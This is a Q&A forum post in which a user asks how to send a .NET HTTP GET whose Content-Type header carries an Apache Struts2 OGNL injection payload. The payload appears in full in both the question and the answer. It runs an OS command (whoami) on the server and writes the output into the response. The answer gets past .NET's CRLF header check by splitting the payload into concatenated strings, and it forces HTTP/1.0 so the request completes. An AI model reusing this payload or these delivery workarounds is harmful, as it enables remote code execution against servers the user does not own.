# HTTP GET using special content-type and exception showing invalid CRLF in .NET 4.5

Tags: c#, .net, http, get, content-type

I have tried to help my friend to test a bug with his website using HttpWebReqeust to do GET and he ask me it's need use special content-type as blow:

```
 url =xxx,
   method =get,
   content-type="%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new  (here is new line) java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}",
  KeepAlive =false,
  OverTime = 8000 (ms)
```

when i run it , it will broken on content-type assignment and error message showing "invalid CRLF";
it's caused by metadata function limited :

[microsoft lib](https://referencesource.microsoft.com/#System/net/System/Net/WebHeaderCollection.cs,9d11c9ec2ddc1887)

and you can see the character in content-type:"p=new java", it contains blank ,new line.

How can I pass the validation ?

Could you please show me some advice ?

many thanks!!!

Answer (score 0):

Hiiiii All

it's solved .

1st I had try to split joint these . 
make as blow:

```
 string payload = "";
            payload = "%{(#_='multipart/form-data')."; ;
            payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).";
            payload += "(#_memberAccess?";
            payload += "(#_memberAccess=#dm):";
            payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container']).";
            payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).";
            payload += "(#ognlUtil.getExcludedPackageNames().clear()).";
            payload += "(#ognlUtil.getExcludedClasses().clear()).";
            payload += "(#context.setMemberAccess(#dm)))).";
            payload += "(#cmd='whoami').";
            payload += "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).";
            payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).";
            payload += "(#p=new java.lang.ProcessBuilder(#cmds)).";
            payload += "(#p.redirectErrorStream(true)).(#process=#p.start()).";
            payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).";
            payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).";
            payload += "(#ros.flush())}";
```

it's working fine.

and then i met another question about exception mentioned unable to read data from connection : connection closed .

I found that .NET default HTTP version is 11
and I try to change this to 10: Request.ProtocolVersion = HttpVersion.Version10;

everything fine now.
Hope if can help someone.